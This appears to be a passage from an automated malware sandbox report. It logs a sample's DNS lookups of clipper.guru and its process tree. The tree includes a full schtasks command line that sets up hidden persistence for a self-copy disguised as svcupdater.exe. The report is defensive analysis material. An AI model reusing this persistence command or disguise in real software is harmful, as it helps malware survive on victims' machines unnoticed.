            TimestampSource PortDest PortSource IPDest IP
            Nov 2, 2022 18:29:50.733129025 CET4944853192.168.2.68.8.8.8
            Nov 2, 2022 18:29:50.750500917 CET53494488.8.8.8192.168.2.6
            Nov 2, 2022 18:30:50.961983919 CET5908253192.168.2.68.8.8.8
            Nov 2, 2022 18:30:50.981436014 CET53590828.8.8.8192.168.2.6
            Nov 2, 2022 18:31:51.913724899 CET5950453192.168.2.68.8.8.8
            Nov 2, 2022 18:31:51.932436943 CET53595048.8.8.8192.168.2.6
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Nov 2, 2022 18:29:50.733129025 CET192.168.2.68.8.8.80x315dStandard query (0)clipper.guruA (IP address)IN (0x0001)false
            Nov 2, 2022 18:30:50.961983919 CET192.168.2.68.8.8.80xeef8Standard query (0)clipper.guruA (IP address)IN (0x0001)false
            Nov 2, 2022 18:31:51.913724899 CET192.168.2.68.8.8.80x97c2Standard query (0)clipper.guruA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Nov 2, 2022 18:29:50.750500917 CET8.8.8.8192.168.2.60x315dNo error (0)clipper.guru45.159.189.115A (IP address)IN (0x0001)false
            Nov 2, 2022 18:30:50.981436014 CET8.8.8.8192.168.2.60xeef8No error (0)clipper.guru45.159.189.115A (IP address)IN (0x0001)false
            Nov 2, 2022 18:31:51.932436943 CET8.8.8.8192.168.2.60x97c2No error (0)clipper.guru45.159.189.115A (IP address)IN (0x0001)false
            • clipper.guru

            Click to jump to process

            Target ID:0
            Start time:18:29:45
            Start date:02/11/2022
            Path:C:\Users\user\Desktop\IVO2cpEukR.exe
            Wow64 process (32bit):false
            Commandline:C:\Users\user\Desktop\IVO2cpEukR.exe
            Imagebase:0x320000
            File size:5021696 bytes
            MD5 hash:6738634D9B3BFCF7EBCA8BE48C091B3E
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low

            Target ID:1
            Start time:18:29:46
            Start date:02/11/2022
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:cmd.exe "/C schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
            Imagebase:0x7ff7cb270000
            File size:273920 bytes
            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Target ID:2
            Start time:18:29:46
            Start date:02/11/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6da640000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Target ID:3
            Start time:18:29:46
            Start date:02/11/2022
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
            Imagebase:0x7ff7a7a50000
            File size:226816 bytes
            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Target ID:4
            Start time:18:29:48
            Start date:02/11/2022
            Path:C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe
            Wow64 process (32bit):false
            Commandline:C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe
            Imagebase:0x290000
            File size:5021696 bytes
            MD5 hash:6738634D9B3BFCF7EBCA8BE48C091B3E
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 15%, ReversingLabs
            Reputation:low

            No disassembly